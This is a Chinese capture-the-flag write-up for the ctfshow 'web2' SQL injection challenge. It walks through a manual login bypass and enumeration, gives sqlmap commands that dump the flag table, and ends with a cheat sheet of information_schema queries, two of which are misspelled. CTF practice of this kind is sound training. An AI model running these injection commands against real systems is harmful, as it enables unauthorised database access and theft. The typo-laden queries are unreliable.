ctfshow—web—web2

打开靶机，根据提示是SQL注入

 

 打开后看到登录窗口

 

 

方法一、手工注入

抓取数据包

 

 开始SQL注入测试

利用万能密码，登录成功

 

查看回显位置

 

 

查询数据库

 

 查询数据库内数据表

 

 如果想整齐一点显示可以添加group_concat()

 

 查询字段

 

 查询字段内容

 

 成功拿到flag

方法二、sqlmap注入

把之前抓取的数据复制到sqlmap根目录下test.txt内

 

 保存完成后开始跑数据库名

python2 sqlmap.py -r test.txt --dbs

 

 跑数据库内数据表

python2 sqlmap.py -r test.txt -D web2 --tables

 

 查看字段

python2 sqlmap.py -r test.txt -D web2 -T flag --columns

 

  查询字段内容

python2 sqlmap.py -r test.txt -D web2 -T flag -C flag --dump

 

 成功拿到flag

 

 

sql手工注入常用语句：

普通语句：schema_name——数据库名；table_name——表名；column_name——字段名；

查询数据库：select schema_name from information_schema.schemata#

　　　　　　slelect database()#

查询数据库表：select table_name from information_schema.tables where table_schema='数据库名'#

查询字段名：select column_name from infromation_schema.columns where table_name='表名'#

查询字段内容：select * from 表名#